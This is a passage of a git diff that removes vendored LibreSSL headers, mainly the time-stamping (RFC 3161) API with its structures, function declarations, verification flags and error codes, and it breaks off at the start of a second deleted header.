-#define	TS_INFO_TIME_NOT_AVAILABLE	14
-#define	TS_INFO_UNACCEPTED_POLICY	15
-#define	TS_INFO_UNACCEPTED_EXTENSION	16
-#define	TS_INFO_ADD_INFO_NOT_AVAILABLE	17
-#define	TS_INFO_SYSTEM_FAILURE		25
-
-typedef struct TS_status_info_st {
-	ASN1_INTEGER *status;
-	STACK_OF(ASN1_UTF8STRING) *text;
-	ASN1_BIT_STRING *failure_info;
-} TS_STATUS_INFO;
-
-DECLARE_STACK_OF(ASN1_UTF8STRING)
-
-/*
-TimeStampResp ::= SEQUENCE  {
-     status                  PKIStatusInfo,
-     timeStampToken          TimeStampToken     OPTIONAL }
-*/
-
-typedef struct TS_resp_st {
-	TS_STATUS_INFO *status_info;
-	PKCS7 *token;
-	TS_TST_INFO *tst_info;
-} TS_RESP;
-
-/* The structure below would belong to the ESS component. */
-
-/*
-IssuerSerial ::= SEQUENCE {
-	issuer                   GeneralNames,
-	serialNumber             CertificateSerialNumber
-	}
-*/
-
-typedef struct ESS_issuer_serial {
-	STACK_OF(GENERAL_NAME)	*issuer;
-	ASN1_INTEGER		*serial;
-} ESS_ISSUER_SERIAL;
-
-/*
-ESSCertID ::=  SEQUENCE {
-        certHash                 Hash,
-        issuerSerial             IssuerSerial OPTIONAL
-}
-*/
-
-typedef struct ESS_cert_id {
-	ASN1_OCTET_STRING *hash;	/* Always SHA-1 digest. */
-	ESS_ISSUER_SERIAL *issuer_serial;
-} ESS_CERT_ID;
-
-DECLARE_STACK_OF(ESS_CERT_ID)
-
-/*
-SigningCertificate ::=  SEQUENCE {
-       certs        SEQUENCE OF ESSCertID,
-       policies     SEQUENCE OF PolicyInformation OPTIONAL
-}
-*/
-
-typedef struct ESS_signing_cert {
-	STACK_OF(ESS_CERT_ID) *cert_ids;
-	STACK_OF(POLICYINFO) *policy_info;
-} ESS_SIGNING_CERT;
-
-
-TS_REQ	*TS_REQ_new(void);
-void	TS_REQ_free(TS_REQ *a);
-int	i2d_TS_REQ(const TS_REQ *a, unsigned char **pp);
-TS_REQ	*d2i_TS_REQ(TS_REQ **a, const unsigned char **pp, long length);
-
-TS_REQ	*TS_REQ_dup(TS_REQ *a);
-
-TS_REQ	*d2i_TS_REQ_fp(FILE *fp, TS_REQ **a);
-int	i2d_TS_REQ_fp(FILE *fp, TS_REQ *a);
-TS_REQ	*d2i_TS_REQ_bio(BIO *fp, TS_REQ **a);
-int	i2d_TS_REQ_bio(BIO *fp, TS_REQ *a);
-
-TS_MSG_IMPRINT	*TS_MSG_IMPRINT_new(void);
-void		TS_MSG_IMPRINT_free(TS_MSG_IMPRINT *a);
-int		i2d_TS_MSG_IMPRINT(const TS_MSG_IMPRINT *a, unsigned char **pp);
-TS_MSG_IMPRINT	*d2i_TS_MSG_IMPRINT(TS_MSG_IMPRINT **a,
-		    const unsigned char **pp, long length);
-
-TS_MSG_IMPRINT	*TS_MSG_IMPRINT_dup(TS_MSG_IMPRINT *a);
-
-TS_MSG_IMPRINT	*d2i_TS_MSG_IMPRINT_fp(FILE *fp, TS_MSG_IMPRINT **a);
-int		i2d_TS_MSG_IMPRINT_fp(FILE *fp, TS_MSG_IMPRINT *a);
-TS_MSG_IMPRINT	*d2i_TS_MSG_IMPRINT_bio(BIO *fp, TS_MSG_IMPRINT **a);
-int		i2d_TS_MSG_IMPRINT_bio(BIO *fp, TS_MSG_IMPRINT *a);
-
-TS_RESP	*TS_RESP_new(void);
-void	TS_RESP_free(TS_RESP *a);
-int	i2d_TS_RESP(const TS_RESP *a, unsigned char **pp);
-TS_RESP	*d2i_TS_RESP(TS_RESP **a, const unsigned char **pp, long length);
-TS_TST_INFO *PKCS7_to_TS_TST_INFO(PKCS7 *token);
-TS_RESP	*TS_RESP_dup(TS_RESP *a);
-
-TS_RESP	*d2i_TS_RESP_fp(FILE *fp, TS_RESP **a);
-int	i2d_TS_RESP_fp(FILE *fp, TS_RESP *a);
-TS_RESP	*d2i_TS_RESP_bio(BIO *fp, TS_RESP **a);
-int	i2d_TS_RESP_bio(BIO *fp, TS_RESP *a);
-
-TS_STATUS_INFO	*TS_STATUS_INFO_new(void);
-void		TS_STATUS_INFO_free(TS_STATUS_INFO *a);
-int		i2d_TS_STATUS_INFO(const TS_STATUS_INFO *a, unsigned char **pp);
-TS_STATUS_INFO	*d2i_TS_STATUS_INFO(TS_STATUS_INFO **a,
-		    const unsigned char **pp, long length);
-TS_STATUS_INFO	*TS_STATUS_INFO_dup(TS_STATUS_INFO *a);
-
-TS_TST_INFO	*TS_TST_INFO_new(void);
-void		TS_TST_INFO_free(TS_TST_INFO *a);
-int		i2d_TS_TST_INFO(const TS_TST_INFO *a, unsigned char **pp);
-TS_TST_INFO	*d2i_TS_TST_INFO(TS_TST_INFO **a, const unsigned char **pp,
-		    long length);
-TS_TST_INFO	*TS_TST_INFO_dup(TS_TST_INFO *a);
-
-TS_TST_INFO	*d2i_TS_TST_INFO_fp(FILE *fp, TS_TST_INFO **a);
-int		i2d_TS_TST_INFO_fp(FILE *fp, TS_TST_INFO *a);
-TS_TST_INFO	*d2i_TS_TST_INFO_bio(BIO *fp, TS_TST_INFO **a);
-int		i2d_TS_TST_INFO_bio(BIO *fp, TS_TST_INFO *a);
-
-TS_ACCURACY	*TS_ACCURACY_new(void);
-void		TS_ACCURACY_free(TS_ACCURACY *a);
-int		i2d_TS_ACCURACY(const TS_ACCURACY *a, unsigned char **pp);
-TS_ACCURACY	*d2i_TS_ACCURACY(TS_ACCURACY **a, const unsigned char **pp,
-		    long length);
-TS_ACCURACY	*TS_ACCURACY_dup(TS_ACCURACY *a);
-
-ESS_ISSUER_SERIAL *ESS_ISSUER_SERIAL_new(void);
-void		  ESS_ISSUER_SERIAL_free(ESS_ISSUER_SERIAL *a);
-int		  i2d_ESS_ISSUER_SERIAL(const ESS_ISSUER_SERIAL *a,
-		    unsigned char **pp);
-ESS_ISSUER_SERIAL *d2i_ESS_ISSUER_SERIAL(ESS_ISSUER_SERIAL **a,
-		    const unsigned char **pp, long length);
-ESS_ISSUER_SERIAL *ESS_ISSUER_SERIAL_dup(ESS_ISSUER_SERIAL *a);
-
-ESS_CERT_ID	*ESS_CERT_ID_new(void);
-void		ESS_CERT_ID_free(ESS_CERT_ID *a);
-int		i2d_ESS_CERT_ID(const ESS_CERT_ID *a, unsigned char **pp);
-ESS_CERT_ID	*d2i_ESS_CERT_ID(ESS_CERT_ID **a, const unsigned char **pp,
-		    long length);
-ESS_CERT_ID	*ESS_CERT_ID_dup(ESS_CERT_ID *a);
-
-ESS_SIGNING_CERT *ESS_SIGNING_CERT_new(void);
-void		 ESS_SIGNING_CERT_free(ESS_SIGNING_CERT *a);
-int		 i2d_ESS_SIGNING_CERT(const ESS_SIGNING_CERT *a,
-		    unsigned char **pp);
-ESS_SIGNING_CERT *d2i_ESS_SIGNING_CERT(ESS_SIGNING_CERT **a,
-		    const unsigned char **pp, long length);
-ESS_SIGNING_CERT *ESS_SIGNING_CERT_dup(ESS_SIGNING_CERT *a);
-
-void ERR_load_TS_strings(void);
-
-int TS_REQ_set_version(TS_REQ *a, long version);
-long TS_REQ_get_version(const TS_REQ *a);
-
-int TS_REQ_set_msg_imprint(TS_REQ *a, TS_MSG_IMPRINT *msg_imprint);
-TS_MSG_IMPRINT *TS_REQ_get_msg_imprint(TS_REQ *a);
-
-int TS_MSG_IMPRINT_set_algo(TS_MSG_IMPRINT *a, X509_ALGOR *alg);
-X509_ALGOR *TS_MSG_IMPRINT_get_algo(TS_MSG_IMPRINT *a);
-
-int TS_MSG_IMPRINT_set_msg(TS_MSG_IMPRINT *a, unsigned char *d, int len);
-ASN1_OCTET_STRING *TS_MSG_IMPRINT_get_msg(TS_MSG_IMPRINT *a);
-
-int TS_REQ_set_policy_id(TS_REQ *a, ASN1_OBJECT *policy);
-ASN1_OBJECT *TS_REQ_get_policy_id(TS_REQ *a);
-
-int TS_REQ_set_nonce(TS_REQ *a, const ASN1_INTEGER *nonce);
-const ASN1_INTEGER *TS_REQ_get_nonce(const TS_REQ *a);
-
-int TS_REQ_set_cert_req(TS_REQ *a, int cert_req);
-int TS_REQ_get_cert_req(const TS_REQ *a);
-
-STACK_OF(X509_EXTENSION) *TS_REQ_get_exts(TS_REQ *a);
-void TS_REQ_ext_free(TS_REQ *a);
-int TS_REQ_get_ext_count(TS_REQ *a);
-int TS_REQ_get_ext_by_NID(TS_REQ *a, int nid, int lastpos);
-int TS_REQ_get_ext_by_OBJ(TS_REQ *a, ASN1_OBJECT *obj, int lastpos);
-int TS_REQ_get_ext_by_critical(TS_REQ *a, int crit, int lastpos);
-X509_EXTENSION *TS_REQ_get_ext(TS_REQ *a, int loc);
-X509_EXTENSION *TS_REQ_delete_ext(TS_REQ *a, int loc);
-int TS_REQ_add_ext(TS_REQ *a, X509_EXTENSION *ex, int loc);
-void *TS_REQ_get_ext_d2i(TS_REQ *a, int nid, int *crit, int *idx);
-
-/* Function declarations for TS_REQ defined in ts/ts_req_print.c */
-
-int TS_REQ_print_bio(BIO *bio, TS_REQ *a);
-
-/* Function declarations for TS_RESP defined in ts/ts_resp_utils.c */
-
-int TS_RESP_set_status_info(TS_RESP *a, TS_STATUS_INFO *info);
-TS_STATUS_INFO *TS_RESP_get_status_info(TS_RESP *a);
-
-/* Caller loses ownership of PKCS7 and TS_TST_INFO objects. */
-void TS_RESP_set_tst_info(TS_RESP *a, PKCS7 *p7, TS_TST_INFO *tst_info);
-PKCS7 *TS_RESP_get_token(TS_RESP *a);
-TS_TST_INFO *TS_RESP_get_tst_info(TS_RESP *a);
-
-int TS_TST_INFO_set_version(TS_TST_INFO *a, long version);
-long TS_TST_INFO_get_version(const TS_TST_INFO *a);
-
-int TS_TST_INFO_set_policy_id(TS_TST_INFO *a, ASN1_OBJECT *policy_id);
-ASN1_OBJECT *TS_TST_INFO_get_policy_id(TS_TST_INFO *a);
-
-int TS_TST_INFO_set_msg_imprint(TS_TST_INFO *a, TS_MSG_IMPRINT *msg_imprint);
-TS_MSG_IMPRINT *TS_TST_INFO_get_msg_imprint(TS_TST_INFO *a);
-
-int TS_TST_INFO_set_serial(TS_TST_INFO *a, const ASN1_INTEGER *serial);
-const ASN1_INTEGER *TS_TST_INFO_get_serial(const TS_TST_INFO *a);
-
-int TS_TST_INFO_set_time(TS_TST_INFO *a, const ASN1_GENERALIZEDTIME *gtime);
-const ASN1_GENERALIZEDTIME *TS_TST_INFO_get_time(const TS_TST_INFO *a);
-
-int TS_TST_INFO_set_accuracy(TS_TST_INFO *a, TS_ACCURACY *accuracy);
-TS_ACCURACY *TS_TST_INFO_get_accuracy(TS_TST_INFO *a);
-
-int TS_ACCURACY_set_seconds(TS_ACCURACY *a, const ASN1_INTEGER *seconds);
-const ASN1_INTEGER *TS_ACCURACY_get_seconds(const TS_ACCURACY *a);
-
-int TS_ACCURACY_set_millis(TS_ACCURACY *a, const ASN1_INTEGER *millis);
-const ASN1_INTEGER *TS_ACCURACY_get_millis(const TS_ACCURACY *a);
-
-int TS_ACCURACY_set_micros(TS_ACCURACY *a, const ASN1_INTEGER *micros);
-const ASN1_INTEGER *TS_ACCURACY_get_micros(const TS_ACCURACY *a);
-
-int TS_TST_INFO_set_ordering(TS_TST_INFO *a, int ordering);
-int TS_TST_INFO_get_ordering(const TS_TST_INFO *a);
-
-int TS_TST_INFO_set_nonce(TS_TST_INFO *a, const ASN1_INTEGER *nonce);
-const ASN1_INTEGER *TS_TST_INFO_get_nonce(const TS_TST_INFO *a);
-
-int TS_TST_INFO_set_tsa(TS_TST_INFO *a, GENERAL_NAME *tsa);
-GENERAL_NAME *TS_TST_INFO_get_tsa(TS_TST_INFO *a);
-
-STACK_OF(X509_EXTENSION) *TS_TST_INFO_get_exts(TS_TST_INFO *a);
-void TS_TST_INFO_ext_free(TS_TST_INFO *a);
-int TS_TST_INFO_get_ext_count(TS_TST_INFO *a);
-int TS_TST_INFO_get_ext_by_NID(TS_TST_INFO *a, int nid, int lastpos);
-int TS_TST_INFO_get_ext_by_OBJ(TS_TST_INFO *a, ASN1_OBJECT *obj, int lastpos);
-int TS_TST_INFO_get_ext_by_critical(TS_TST_INFO *a, int crit, int lastpos);
-X509_EXTENSION *TS_TST_INFO_get_ext(TS_TST_INFO *a, int loc);
-X509_EXTENSION *TS_TST_INFO_delete_ext(TS_TST_INFO *a, int loc);
-int TS_TST_INFO_add_ext(TS_TST_INFO *a, X509_EXTENSION *ex, int loc);
-void *TS_TST_INFO_get_ext_d2i(TS_TST_INFO *a, int nid, int *crit, int *idx);
-
-/* Declarations related to response generation, defined in ts/ts_resp_sign.c. */
-
-/* Optional flags for response generation. */
-
-/* Don't include the TSA name in response. */
-#define	TS_TSA_NAME		0x01
-
-/* Set ordering to true in response. */
-#define	TS_ORDERING		0x02
-
-/*
- * Include the signer certificate and the other specified certificates in
- * the ESS signing certificate attribute beside the PKCS7 signed data.
- * Only the signer certificates is included by default.
- */
-#define	TS_ESS_CERT_ID_CHAIN	0x04
-
-/* Forward declaration. */
-struct TS_resp_ctx;
-
-/* This must return a unique number less than 160 bits long. */
-typedef ASN1_INTEGER *(*TS_serial_cb)(struct TS_resp_ctx *, void *);
-
-/* This must return the seconds and microseconds since Jan 1, 1970 in
-   the sec and usec variables allocated by the caller.
-   Return non-zero for success and zero for failure. */
-typedef	int (*TS_time_cb)(struct TS_resp_ctx *, void *, time_t *sec, long *usec);
-
-/* This must process the given extension.
- * It can modify the TS_TST_INFO object of the context.
- * Return values: !0 (processed), 0 (error, it must set the
- * status info/failure info of the response).
- */
-typedef	int (*TS_extension_cb)(struct TS_resp_ctx *, X509_EXTENSION *, void *);
-
-typedef struct TS_resp_ctx {
-	X509		*signer_cert;
-	EVP_PKEY	*signer_key;
-	STACK_OF(X509)	*certs;	/* Certs to include in signed data. */
-	STACK_OF(ASN1_OBJECT)	*policies;	/* Acceptable policies. */
-	ASN1_OBJECT	*default_policy; /* It may appear in policies, too. */
-	STACK_OF(EVP_MD)	*mds;	/* Acceptable message digests. */
-	ASN1_INTEGER	*seconds;	/* accuracy, 0 means not specified. */
-	ASN1_INTEGER	*millis;	/* accuracy, 0 means not specified. */
-	ASN1_INTEGER	*micros;	/* accuracy, 0 means not specified. */
-	unsigned	clock_precision_digits; /* fraction of seconds in
-						   time stamp token. */
-	unsigned	flags;		/* Optional info, see values above. */
-
-	/* Callback functions. */
-	TS_serial_cb serial_cb;
-	void *serial_cb_data;	/* User data for serial_cb. */
-
-	TS_time_cb time_cb;
-	void *time_cb_data;	/* User data for time_cb. */
-
-	TS_extension_cb extension_cb;
-	void *extension_cb_data;	/* User data for extension_cb. */
-
-	/* These members are used only while creating the response. */
-	TS_REQ		*request;
-	TS_RESP		*response;
-	TS_TST_INFO	*tst_info;
-} TS_RESP_CTX;
-
-DECLARE_STACK_OF(EVP_MD)
-
-/* Creates a response context that can be used for generating responses. */
-TS_RESP_CTX *TS_RESP_CTX_new(void);
-void TS_RESP_CTX_free(TS_RESP_CTX *ctx);
-
-/* This parameter must be set. */
-int TS_RESP_CTX_set_signer_cert(TS_RESP_CTX *ctx, X509 *signer);
-
-/* This parameter must be set. */
-int TS_RESP_CTX_set_signer_key(TS_RESP_CTX *ctx, EVP_PKEY *key);
-
-/* This parameter must be set. */
-int TS_RESP_CTX_set_def_policy(TS_RESP_CTX *ctx, ASN1_OBJECT *def_policy);
-
-/* No additional certs are included in the response by default. */
-int TS_RESP_CTX_set_certs(TS_RESP_CTX *ctx, STACK_OF(X509) *certs);
-
-/* Adds a new acceptable policy, only the default policy
-   is accepted by default. */
-int TS_RESP_CTX_add_policy(TS_RESP_CTX *ctx, ASN1_OBJECT *policy);
-
-/* Adds a new acceptable message digest. Note that no message digests
-   are accepted by default. The md argument is shared with the caller. */
-int TS_RESP_CTX_add_md(TS_RESP_CTX *ctx, const EVP_MD *md);
-
-/* Accuracy is not included by default. */
-int TS_RESP_CTX_set_accuracy(TS_RESP_CTX *ctx,
-    int secs, int millis, int micros);
-
-/* Clock precision digits, i.e. the number of decimal digits:
-   '0' means sec, '3' msec, '6' usec, and so on. Default is 0. */
-int TS_RESP_CTX_set_clock_precision_digits(TS_RESP_CTX *ctx,
-    unsigned clock_precision_digits);
-/* At most we accept usec precision. */
-#define TS_MAX_CLOCK_PRECISION_DIGITS	6
-
-/* No flags are set by default. */
-void TS_RESP_CTX_add_flags(TS_RESP_CTX *ctx, int flags);
-
-/* Default callback always returns a constant. */
-void TS_RESP_CTX_set_serial_cb(TS_RESP_CTX *ctx, TS_serial_cb cb, void *data);
-
-/* Default callback rejects all extensions. The extension callback is called
- * when the TS_TST_INFO object is already set up and not signed yet. */
-/* FIXME: extension handling is not tested yet. */
-void TS_RESP_CTX_set_extension_cb(TS_RESP_CTX *ctx,
-    TS_extension_cb cb, void *data);
-
-/* The following methods can be used in the callbacks. */
-int TS_RESP_CTX_set_status_info(TS_RESP_CTX *ctx,
-    int status, const char *text);
-
-/* Sets the status info only if it is still TS_STATUS_GRANTED. */
-int TS_RESP_CTX_set_status_info_cond(TS_RESP_CTX *ctx,
-    int status, const char *text);
-
-int TS_RESP_CTX_add_failure_info(TS_RESP_CTX *ctx, int failure);
-
-/* The get methods below can be used in the extension callback. */
-TS_REQ *TS_RESP_CTX_get_request(TS_RESP_CTX *ctx);
-
-TS_TST_INFO *TS_RESP_CTX_get_tst_info(TS_RESP_CTX *ctx);
-
-/*
- * Creates the signed TS_TST_INFO and puts it in TS_RESP.
- * In case of errors it sets the status info properly.
- * Returns NULL only in case of memory allocation/fatal error.
- */
-TS_RESP *TS_RESP_create_response(TS_RESP_CTX *ctx, BIO *req_bio);
-
-/*
- * Declarations related to response verification,
- * they are defined in ts/ts_resp_verify.c.
- */
-
-int TS_RESP_verify_signature(PKCS7 *token, STACK_OF(X509) *certs,
-    X509_STORE *store, X509 **signer_out);
-
-/* Context structure for the generic verify method. */
-
-/* Verify the signer's certificate and the signature of the response. */
-#define	TS_VFY_SIGNATURE	(1u << 0)
-/* Verify the version number of the response. */
-#define	TS_VFY_VERSION		(1u << 1)
-/* Verify if the policy supplied by the user matches the policy of the TSA. */
-#define	TS_VFY_POLICY		(1u << 2)
-/* Verify the message imprint provided by the user. This flag should not be
-   specified with TS_VFY_DATA. */
-#define	TS_VFY_IMPRINT		(1u << 3)
-/* Verify the message imprint computed by the verify method from the user
-   provided data and the MD algorithm of the response. This flag should not be
-   specified with TS_VFY_IMPRINT. */
-#define	TS_VFY_DATA		(1u << 4)
-/* Verify the nonce value. */
-#define	TS_VFY_NONCE		(1u << 5)
-/* Verify if the TSA name field matches the signer certificate. */
-#define	TS_VFY_SIGNER		(1u << 6)
-/* Verify if the TSA name field equals to the user provided name. */
-#define	TS_VFY_TSA_NAME		(1u << 7)
-
-/* You can use the following convenience constants. */
-#define	TS_VFY_ALL_IMPRINT	(TS_VFY_SIGNATURE	\
-				 | TS_VFY_VERSION	\
-				 | TS_VFY_POLICY	\
-				 | TS_VFY_IMPRINT	\
-				 | TS_VFY_NONCE		\
-				 | TS_VFY_SIGNER	\
-				 | TS_VFY_TSA_NAME)
-#define	TS_VFY_ALL_DATA		(TS_VFY_SIGNATURE	\
-				 | TS_VFY_VERSION	\
-				 | TS_VFY_POLICY	\
-				 | TS_VFY_DATA		\
-				 | TS_VFY_NONCE		\
-				 | TS_VFY_SIGNER	\
-				 | TS_VFY_TSA_NAME)
-
-typedef struct TS_verify_ctx {
-	/* Set this to the union of TS_VFY_... flags you want to carry out. */
-	unsigned	flags;
-
-	/* Must be set only with TS_VFY_SIGNATURE. certs is optional. */
-	X509_STORE	*store;
-	STACK_OF(X509)	*certs;
-
-	/* Must be set only with TS_VFY_POLICY. */
-	ASN1_OBJECT	*policy;
-
-	/* Must be set only with TS_VFY_IMPRINT. If md_alg is NULL,
-	   the algorithm from the response is used. */
-	X509_ALGOR	*md_alg;
-	unsigned char	*imprint;
-	unsigned	imprint_len;
-
-	/* Must be set only with TS_VFY_DATA. */
-	BIO		*data;
-
-	/* Must be set only with TS_VFY_TSA_NAME. */
-	ASN1_INTEGER	*nonce;
-
-	/* Must be set only with TS_VFY_TSA_NAME. */
-	GENERAL_NAME	*tsa_name;
-} TS_VERIFY_CTX;
-
-int TS_RESP_verify_response(TS_VERIFY_CTX *ctx, TS_RESP *response);
-int TS_RESP_verify_token(TS_VERIFY_CTX *ctx, PKCS7 *token);
-
-/*
- * Declarations related to response verification context,
- * they are defined in ts/ts_verify_ctx.c.
- */
-
-/* Set all fields to zero. */
-TS_VERIFY_CTX *TS_VERIFY_CTX_new(void);
-void TS_VERIFY_CTX_init(TS_VERIFY_CTX *ctx);
-void TS_VERIFY_CTX_free(TS_VERIFY_CTX *ctx);
-void TS_VERIFY_CTX_cleanup(TS_VERIFY_CTX *ctx);
-
-/*
- * If ctx is NULL, it allocates and returns a new object, otherwise
- * it returns ctx. It initialises all the members as follows:
- * flags = TS_VFY_ALL_IMPRINT & ~(TS_VFY_TSA_NAME | TS_VFY_SIGNATURE)
- * certs = NULL
- * store = NULL
- * policy = policy from the request or NULL if absent (in this case
- *	TS_VFY_POLICY is cleared from flags as well)
- * md_alg = MD algorithm from request
- * imprint, imprint_len = imprint from request
- * data = NULL
- * nonce, nonce_len = nonce from the request or NULL if absent (in this case
- * 	TS_VFY_NONCE is cleared from flags as well)
- * tsa_name = NULL
- * Important: after calling this method TS_VFY_SIGNATURE should be added!
- */
-TS_VERIFY_CTX *TS_REQ_to_TS_VERIFY_CTX(TS_REQ *req, TS_VERIFY_CTX *ctx);
-
-/* Function declarations for TS_RESP defined in ts/ts_resp_print.c */
-
-int TS_RESP_print_bio(BIO *bio, TS_RESP *a);
-int TS_STATUS_INFO_print_bio(BIO *bio, TS_STATUS_INFO *a);
-int TS_TST_INFO_print_bio(BIO *bio, TS_TST_INFO *a);
-
-/* Common utility functions defined in ts/ts_lib.c */
-
-int TS_ASN1_INTEGER_print_bio(BIO *bio, const ASN1_INTEGER *num);
-int TS_OBJ_print_bio(BIO *bio, const ASN1_OBJECT *obj);
-int TS_ext_print_bio(BIO *bio, const STACK_OF(X509_EXTENSION) *extensions);
-int TS_X509_ALGOR_print_bio(BIO *bio, const X509_ALGOR *alg);
-int TS_MSG_IMPRINT_print_bio(BIO *bio, TS_MSG_IMPRINT *msg);
-
-/* Function declarations for handling configuration options,
-   defined in ts/ts_conf.c */
-
-X509 *TS_CONF_load_cert(const char *file);
-STACK_OF(X509) *TS_CONF_load_certs(const char *file);
-EVP_PKEY *TS_CONF_load_key(const char *file, const char *pass);
-const char *TS_CONF_get_tsa_section(CONF *conf, const char *section);
-int TS_CONF_set_serial(CONF *conf, const char *section, TS_serial_cb cb,
-    TS_RESP_CTX *ctx);
-int TS_CONF_set_crypto_device(CONF *conf, const char *section,
-    const char *device);
-int TS_CONF_set_default_engine(const char *name);
-int TS_CONF_set_signer_cert(CONF *conf, const char *section,
-    const char *cert, TS_RESP_CTX *ctx);
-int TS_CONF_set_certs(CONF *conf, const char *section, const char *certs,
-    TS_RESP_CTX *ctx);
-int TS_CONF_set_signer_key(CONF *conf, const char *section,
-    const char *key, const char *pass, TS_RESP_CTX *ctx);
-int TS_CONF_set_def_policy(CONF *conf, const char *section,
-    const char *policy, TS_RESP_CTX *ctx);
-int TS_CONF_set_policies(CONF *conf, const char *section, TS_RESP_CTX *ctx);
-int TS_CONF_set_digests(CONF *conf, const char *section, TS_RESP_CTX *ctx);
-int TS_CONF_set_accuracy(CONF *conf, const char *section, TS_RESP_CTX *ctx);
-int TS_CONF_set_clock_precision_digits(CONF *conf, const char *section,
-    TS_RESP_CTX *ctx);
-int TS_CONF_set_ordering(CONF *conf, const char *section, TS_RESP_CTX *ctx);
-int TS_CONF_set_tsa_name(CONF *conf, const char *section, TS_RESP_CTX *ctx);
-int TS_CONF_set_ess_cert_id_chain(CONF *conf, const char *section,
-    TS_RESP_CTX *ctx);
-
-/* -------------------------------------------------- */
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_TS_strings(void);
-
-/* Error codes for the TS functions. */
-
-/* Function codes. */
-#define TS_F_D2I_TS_RESP				 147
-#define TS_F_DEF_SERIAL_CB				 110
-#define TS_F_DEF_TIME_CB				 111
-#define TS_F_ESS_ADD_SIGNING_CERT			 112
-#define TS_F_ESS_CERT_ID_NEW_INIT			 113
-#define TS_F_ESS_SIGNING_CERT_NEW_INIT			 114
-#define TS_F_INT_TS_RESP_VERIFY_TOKEN			 149
-#define TS_F_PKCS7_TO_TS_TST_INFO			 148
-#define TS_F_TS_ACCURACY_SET_MICROS			 115
-#define TS_F_TS_ACCURACY_SET_MILLIS			 116
-#define TS_F_TS_ACCURACY_SET_SECONDS			 117
-#define TS_F_TS_CHECK_IMPRINTS				 100
-#define TS_F_TS_CHECK_NONCES				 101
-#define TS_F_TS_CHECK_POLICY				 102
-#define TS_F_TS_CHECK_SIGNING_CERTS			 103
-#define TS_F_TS_CHECK_STATUS_INFO			 104
-#define TS_F_TS_COMPUTE_IMPRINT				 145
-#define TS_F_TS_CONF_SET_DEFAULT_ENGINE			 146
-#define TS_F_TS_GET_STATUS_TEXT				 105
-#define TS_F_TS_MSG_IMPRINT_SET_ALGO			 118
-#define TS_F_TS_REQ_SET_MSG_IMPRINT			 119
-#define TS_F_TS_REQ_SET_NONCE				 120
-#define TS_F_TS_REQ_SET_POLICY_ID			 121
-#define TS_F_TS_RESP_CREATE_RESPONSE			 122
-#define TS_F_TS_RESP_CREATE_TST_INFO			 123
-#define TS_F_TS_RESP_CTX_ADD_FAILURE_INFO		 124
-#define TS_F_TS_RESP_CTX_ADD_MD				 125
-#define TS_F_TS_RESP_CTX_ADD_POLICY			 126
-#define TS_F_TS_RESP_CTX_NEW				 127
-#define TS_F_TS_RESP_CTX_SET_ACCURACY			 128
-#define TS_F_TS_RESP_CTX_SET_CERTS			 129
-#define TS_F_TS_RESP_CTX_SET_DEF_POLICY			 130
-#define TS_F_TS_RESP_CTX_SET_SIGNER_CERT		 131
-#define TS_F_TS_RESP_CTX_SET_STATUS_INFO		 132
-#define TS_F_TS_RESP_GET_POLICY				 133
-#define TS_F_TS_RESP_SET_GENTIME_WITH_PRECISION		 134
-#define TS_F_TS_RESP_SET_STATUS_INFO			 135
-#define TS_F_TS_RESP_SET_TST_INFO			 150
-#define TS_F_TS_RESP_SIGN				 136
-#define TS_F_TS_RESP_VERIFY_SIGNATURE			 106
-#define TS_F_TS_RESP_VERIFY_TOKEN			 107
-#define TS_F_TS_TST_INFO_SET_ACCURACY			 137
-#define TS_F_TS_TST_INFO_SET_MSG_IMPRINT		 138
-#define TS_F_TS_TST_INFO_SET_NONCE			 139
-#define TS_F_TS_TST_INFO_SET_POLICY_ID			 140
-#define TS_F_TS_TST_INFO_SET_SERIAL			 141
-#define TS_F_TS_TST_INFO_SET_TIME			 142
-#define TS_F_TS_TST_INFO_SET_TSA			 143
-#define TS_F_TS_VERIFY					 108
-#define TS_F_TS_VERIFY_CERT				 109
-#define TS_F_TS_VERIFY_CTX_NEW				 144
-
-/* Reason codes. */
-#define TS_R_BAD_PKCS7_TYPE				 132
-#define TS_R_BAD_TYPE					 133
-#define TS_R_CERTIFICATE_VERIFY_ERROR			 100
-#define TS_R_COULD_NOT_SET_ENGINE			 127
-#define TS_R_COULD_NOT_SET_TIME				 115
-#define TS_R_D2I_TS_RESP_INT_FAILED			 128
-#define TS_R_DETACHED_CONTENT				 134
-#define TS_R_ESS_ADD_SIGNING_CERT_ERROR			 116
-#define TS_R_ESS_SIGNING_CERTIFICATE_ERROR		 101
-#define TS_R_INVALID_NULL_POINTER			 102
-#define TS_R_INVALID_SIGNER_CERTIFICATE_PURPOSE		 117
-#define TS_R_MESSAGE_IMPRINT_MISMATCH			 103
-#define TS_R_NONCE_MISMATCH				 104
-#define TS_R_NONCE_NOT_RETURNED				 105
-#define TS_R_NO_CONTENT					 106
-#define TS_R_NO_TIME_STAMP_TOKEN			 107
-#define TS_R_PKCS7_ADD_SIGNATURE_ERROR			 118
-#define TS_R_PKCS7_ADD_SIGNED_ATTR_ERROR		 119
-#define TS_R_PKCS7_TO_TS_TST_INFO_FAILED		 129
-#define TS_R_POLICY_MISMATCH				 108
-#define TS_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE	 120
-#define TS_R_RESPONSE_SETUP_ERROR			 121
-#define TS_R_SIGNATURE_FAILURE				 109
-#define TS_R_THERE_MUST_BE_ONE_SIGNER			 110
-#define TS_R_TIME_SYSCALL_ERROR				 122
-#define TS_R_TOKEN_NOT_PRESENT				 130
-#define TS_R_TOKEN_PRESENT				 131
-#define TS_R_TSA_NAME_MISMATCH				 111
-#define TS_R_TSA_UNTRUSTED				 112
-#define TS_R_TST_INFO_SETUP_ERROR			 123
-#define TS_R_TS_DATASIGN				 124
-#define TS_R_UNACCEPTABLE_POLICY			 125
-#define TS_R_UNSUPPORTED_MD_ALGORITHM			 126
-#define TS_R_UNSUPPORTED_VERSION			 113
-#define TS_R_WRONG_CONTENT_TYPE				 114
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/txt_db.h b/thirdparty/libressl/include/openssl/txt_db.h
deleted file mode 100644
index 56b6b42..0000000
--- a/thirdparty/libressl/include/openssl/txt_db.h
+++ /dev/null
@@ -1,112 +0,0 @@
-/* $OpenBSD: txt_db.h,v 1.9 2014/07/10 22:45:58 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
